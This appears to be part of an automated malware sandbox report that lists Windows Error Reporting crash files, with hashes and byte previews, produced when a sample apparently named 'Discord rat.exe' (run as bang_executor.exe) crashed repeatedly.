                                      Created / dropped Files

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bang_executor.ex_a58ea64ccc4edea7475b643a6fe3417210ac467c_6e59c2f5_17ba656c-7e17-49b1-8f7f-b062612a9b90\Report.wer

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1758683299192885
                                      Encrypted:false
                                      SSDEEP:192:hrrPZYP08rLVrqxa2Qdl/N6fmzuiF6Z24lO8GB:NrPZr8rLVkaL/gfmzuiF6Y4lO8W
                                      MD5:35A8D8B5FFF63F0C165575B6464DCAC2
                                      SHA1:C0C58CA72CE171651CC60EA23D43037138E2DEF3
                                      SHA-256:5EC0C7D4FACBDA19EEACAC615A3BAE0AF58D79393CE6303F8A9E4E3D354FE8BF
                                      SHA-512:5F2D3EF3C4643FAED7F0C04F82691110F61A93B3388700108906FD79A92997E416E6250812D0A386362BECFB50F70953D20EB6D2DD0A4066C168996C12F8A7FD
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.2.7.4.4.3.7.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.3.9.4.7.5.0.7.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.b.a.6.5.6.c.-.7.e.1.7.-.4.9.b.1.-.8.f.7.f.-.b.0.6.2.6.1.2.a.9.b.9.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.0.4.c.b.4.6.-.0.c.7.f.-.4.a.3.0.-.b.e.f.d.-.d.f.0.7.a.7.e.5.6.e.6.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.d.4.-.0.0.0.1.-.0.0.1.4.-.c.3.6.f.-.9.8.7.b.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bang_executor.ex_a58ea64ccc4edea7475b643a6fe3417210ac467c_6e59c2f5_3ba90cf5-a7b3-461f-b33c-9b4690eee07f\Report.wer

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1696374456947438
                                      Encrypted:false
                                      SSDEEP:192:RXJB6KYP08rLVrqxaKTzlT0NjrzuiF6Z24lO8GB:fBvr8rLVkasxAjrzuiF6Y4lO8W
                                      MD5:9C35D7F324E701F99A44AE5FCBDCC7F7
                                      SHA1:7C3C8E588A95F4023769C1493F2CB0822E6EDD9E
                                      SHA-256:0D307C471A153A8B722E343B099F411D6A26B13282B284608EBF49B6C40A852C
                                      SHA-512:FFC232DD1593E43102AEF51B8724671BF85E90C5BE9D603CECEE5919C3B7993BE99093BED6C41678C6C445E1193D3E83166596CF012ED5146F391FD23462A29F
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.2.8.3.7.2.6.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.8.9.4.0.8.7.2.8.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.a.9.0.c.f.5.-.a.7.b.3.-.4.6.1.f.-.b.3.3.c.-.9.b.4.6.9.0.e.e.e.0.7.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.8.f.5.d.7.d.-.3.b.3.9.-.4.5.c.e.-.8.0.4.e.-.1.8.6.7.4.f.9.5.7.b.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.4.-.0.0.0.1.-.0.0.1.4.-.2.8.6.f.-.5.e.7.c.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bang_executor.ex_a58ea64ccc4edea7475b643a6fe3417210ac467c_6e59c2f5_907038ee-df92-4784-b503-4fa397feb802\Report.wer

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.1695786632423242
                                      Encrypted:false
                                      SSDEEP:192:MXdxYP08rLVrqxaiTzlT0NjrzuiF6Z24lO8GB:kdxr8rLVkakxAjrzuiF6Y4lO8W
                                      MD5:E89F991711C137DB69D130CE3E20BC40
                                      SHA1:D75641FF61E9FF566323927A3BC55AAAEFCEB1A9
                                      SHA-256:BBAE25ABE7DF5093CE39BE8105D1B27C94F3D3FD6B55585F4E9D25B5E00E806F
                                      SHA-512:FE5BA2E55AC73855A992D1274BC75D357DC0F788150486AC68A970487D96D1F0C00CE6D41CBEB22765390509D8340AB819CA018E5D51E4F0B08EC20A6ACDA21A
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.0.3.6.7.8.2.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.1.3.2.0.9.6.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.7.0.3.8.e.e.-.d.f.9.2.-.4.7.8.4.-.b.5.0.3.-.4.f.a.3.9.7.f.e.b.8.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.6.b.1.1.0.b.-.8.b.1.c.-.4.9.8.2.-.9.6.5.4.-.2.3.0.1.8.1.9.c.c.9.4.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.c.-.0.0.0.1.-.0.0.1.4.-.e.a.5.9.-.2.2.8.1.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.

                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bang_executor.ex_a58ea64ccc4edea7475b643a6fe3417210ac467c_6e59c2f5_ccbe60c1-4529-4aa3-934e-b935cf39675a\Report.wer

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):65536
                                      Entropy (8bit):1.169538869804829
                                      Encrypted:false
                                      SSDEEP:192:C5Gf6YP08rLVrqxaqDzlT0NjrzuiF6Z24lO8GB:IGf6r8rLVkaMxAjrzuiF6Y4lO8W
                                      MD5:7DD183A3B7EEE3AAB2CF18239E4781D5
                                      SHA1:0386577393EC5C0583F7ABD4F95E6FC7D49EB6A7
                                      SHA-256:9FA55904790E18B21BB27A746376089535B16B59B5D68057A5B38978EC50AE62
                                      SHA-512:F7C2EBF565A257A1AC44FDA779E82D110CCA7CE02F94C609F8B5D0C7669875D7F91AF57F56774D9EC0EFBB2A14F3E6236303DC289E9B9DC0760A1C324DDF96E9
                                      Malicious:false
                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.8.9.3.6.9.4.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.4.9.0.9.0.9.6.8.6.9.5.4.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.c.b.e.6.0.c.1.-.4.5.2.9.-.4.a.a.3.-.9.3.4.e.-.b.9.3.5.c.f.3.9.6.7.5.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.5.0.7.b.0.8.-.f.b.3.b.-.4.8.b.b.-.9.f.6.d.-.a.e.4.c.6.2.4.6.a.a.0.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.b.a.n.g._.e.x.e.c.u.t.o.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.s.c.o.r.d. .r.a.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.0.-.0.0.0.1.-.0.0.1.4.-.c.1.a.4.-.4.0.8.6.3.2.6.0.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.f.e.e.e.1.7.a.3.6.3.4.1.9.f.5.5.d.6.5.e.a.2.c.1.6.f.5.b.3.0.0.0.0.0.0.0.0.0.!.0.0.0.0.8.9.4.f.8.d.b.6.3.a.8.f.4.1.f.9.1.3.a.5.f.5.c.6.9.d.1.1.9.9.e.c.8.a.e.3.f.2.1.3.!.b.a.n.g._.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB52A.tmp.dmp

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:14:53 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):559323
                                      Entropy (8bit):2.874649603920775
                                      Encrypted:false
                                      SSDEEP:3072:AkoOgRwcSjSze1CCqKi6wl3+vVPPP32oVmfyBOXpIymdSZ+Ovvy2HlL4J4SfIj/w:Aiq8NqD6wl3Qd3qHlctSxRqN
                                      MD5:5D28376434E3298054540937E8FB03A6
                                      SHA1:2F42F47BDF1B0A24A7E4F0B6A336E2AC585733C0
                                      SHA-256:F512FB78F8481485AF72432DE668695A88C1B702CF662712DA5F2A8D1C602022
                                      SHA-512:1577D9B03BF29B9BDEC226BA1C81302F08E2914CC1DCBEE18CC2F83D224891D3FE5472C1935F6D6BBBF78E9A03D99D52D2C4F0187691938FA1D32454CF5A336E
                                      Malicious:false
                                      Preview:MDMP..a..... ........F.e....................................<....)..........H).......?..............l.......8...........T............[...-..........T4..........@6..............................................................................eJ.......6......Lw......................T............F.e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB598.tmp.dmp

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:14:53 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):554753
                                      Entropy (8bit):2.90085272752717
                                      Encrypted:false
                                      SSDEEP:3072:SbvuzfERbcS+gE1CCq/wZP3+vTPPdXd2Qj4oVmfyBOXpIymdSZoy6urw+tH1d4F2:wvujePeq/wt3QDVF+tVdp
                                      MD5:9FCD32435AB3BFB9F3AC22D5CE01D5AE
                                      SHA1:F31389EBAC610A7FA2A37DB284B3F5DCD714FD43
                                      SHA-256:1E13088A1A171C6548CD7462ABDD37F1715FC370621B80B0A6CE992D08E25442
                                      SHA-512:8F413C54166CFBE7B90BF4BFDBCD14C04D5438BB636888294BEDB8A03559F47CD0587E46A030F4DCC26A4CAB67311737052657A44F347E40119F73B0DF2195C3
                                      Malicious:false
                                      Preview:MDMP..a..... ........F.e....................................<....(...........(.......?..............l.......8...........T...........([...............3...........5..............................................................................eJ......l6......Lw......................T............F.e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB80A.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8754
                                      Entropy (8bit):3.697098077897683
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJssuo6YLZ6igmfZhEDGprp89bFqkf9Xm:R6lXJmo6Yl6igmfcDlFRfA
                                      MD5:B0BBE5EB76327E511DC94ED0EB0B4684
                                      SHA1:39264F41C2960B9C2B1ABB800B1AF7BF566534A2
                                      SHA-256:2E478D46C418DD41F3A0134AB62B8212A9640CE65386CC70AF87E78C7353C571
                                      SHA-512:A174D4DF41B40FA8A46165F65ECC132145EB16E1B1F5504BB88A46FB78975D12FB0EE56F292C134B3991F47254C4CB0759FC22FCACE0CA07B96FBCE364BE07D3
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.2.<./.P.i.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB819.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):6782
                                      Entropy (8bit):3.7207337012946278
                                      Encrypted:false
                                      SSDEEP:96:RSIU6o7wVetbdMXYZhYTyiztDPgaM4Uv89bFcWDNqftXm:R6l7wVeJdMXYZhEDGprv89bFcWkftXm
                                      MD5:ADC08D562FE789A34C7B2CB17BA1D1BB
                                      SHA1:624BB041AD9395C0363A431A0437F4BFDF7EC17F
                                      SHA-256:3A1824069D156FE4D00673F8914DA7F36FCE97CB57E49FF65CB48FA2BBE07E72
                                      SHA-512:95433AAED7594F94458C1BBBF0965B76B586F589C3247F440333CF6B80D549FB183A537056037BAB369FB02781C51F5EAFC3170FA365CA6444688D7C110A878D
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.3.6.<./.P.i.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB849.tmp.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.465981198129252
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VYBYm8M4JL4b6FZyq8vj4blwgJd:uIjfSI7Mh7VNJ82WUxwgJd
                                      MD5:D85A8B766B8BD01A8B97D5B45A97B4D3
                                      SHA1:4712BE54E9A7CE86BC4C9B2977BCBE4A6E7B4BE6
                                      SHA-256:100C24FE96D3A388EA8E2E2D7DB843BC52CF2741F1EE5537808FA0A11504AEA1
                                      SHA-512:8CBC85033E04E5163C957C5543E2272F0AE186E95F0A89EDE0571FA2E8C863D7879DB2A394FD964C578C38416E699B9C2C0BE10EB8213B67C893226F52E99E7D
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8C7.tmp.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.46884000180897
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VYiYm8M4JL4b6FYsyq8vj4bQKwg3d:uIjfSI7Mh7V6J8nsWU8Kwg3d
                                      MD5:451B584ADF982F4D817AD2E844F656D4
                                      SHA1:C684CA5B1AAEB787EB04B9E9663E3E14D02A77EC
                                      SHA-256:46CFF8CC7656A2A1EB037E73BE02E8C1F4542685F9BE81DB6FA1B0A5F5A102E4
                                      SHA-512:9628D9A13ED431A5ACE98EB10DD5E444BA54C0ACEF5195DBC578542C89C10F306D81BA32880C6F1C3504153080E80CA903B3686C49909E5B781BB41F08781EC5
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="194897" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD313.tmp.dmp

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:Mini DuMP crash report, 16 streams, Thu Feb 15 17:15:00 2024, 0x1205a4 type
                                      Category:dropped
                                      Size (bytes):541993
                                      Entropy (8bit):2.9288275066699176
                                      Encrypted:false
                                      SSDEEP:3072:Q1o97aAe7JMRscSLfdH+1CCqFs3M3+vrtIlP0nesoVmfyBOXpIymdSZQyV0D78oS:iH7AYz2qFmM3QErc0DWc
                                      MD5:2E9CCAE3404460BE92A887880C575786
                                      SHA1:E929036FB30DC79A238AC69667C9A2BCDFC347B8
                                      SHA-256:AB7E3BD09AEC7F03F01793DDA6C3848947B5CBC852417108F66F63E73714CCDD
                                      SHA-512:BE33CFDA97CF5B222D134A3A670FCEC832CAAFA8139B9C6B284F39E8657F66405D764FB611061CA6AF3395B16FDE70C06C87DA40885F5EF2A27440A5492B3F97
                                      Malicious:false
                                      Preview:MDMP..a..... ........F.e....................................<...p(...........(......T?..............l.......8...........T............Y..A............3...........5..............................................................................eJ......<6......Lw......................T............F.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD49A.tmp.WERInternalMetadata.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8812
                                      Entropy (8bit):3.6966701500131545
                                      Encrypted:false
                                      SSDEEP:192:R6l7wVeJctut6Y9rqm2LgmfZhEDGprM89bqckfZOm:R6lXJft6YxqZLgmfcDKq3fZ
                                      MD5:4159CD5C3BC52FBEA50A730CA3DC9C44
                                      SHA1:CF37E0057E03B03A141A4958DCE1437EFD6451BE
                                      SHA-256:E38CB5F32F5CF2604B12EC22A885296C5EE2F7828D0810637B7F624342A0E455
                                      SHA-512:20B29149C1E5C8C8C676585183F968FB8035A49BC10457DCDC18212F869B427453A3B2C335B43BF8F7CB18278DCD640DFCB0906F3D1A135116FCDE96B08EB0FA
                                      Malicious:false
                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.5.6.<./.P.i.

                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4DA.tmp.xml

                                      Download File
                                      Process:C:\Windows\System32\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4825
                                      Entropy (8bit):4.464483125288418
                                      Encrypted:false
                                      SSDEEP:48:cvIwWl8zsUJg771I9rIWpW8VYz5Ym8M4JL4b6Fzyq8vj4bycwgXd:uIjfSI7Mh7VlJ8QWUGcwgXd
                                      MD5:28819F5287AF50E3E35F4A83A491FC65
                                      SHA1:C2F09E609577EF160F8E81F6967C93B98F3F4735
                                      SHA-256:B202F56356E364AACAF0A5F69AE04F28390C347DF2E1173E427483D74E85C8BB
                                      SHA-512:087852F519F705CFAD3AA199DF92319C534AE4F167AB0072E3B3EE6360BECCA285E6FADA628FF779E8FA3C5DB1FF8AB759C0C37DD77DBEB1CD9A8DEF5D405C9A
                                      Malicious:false
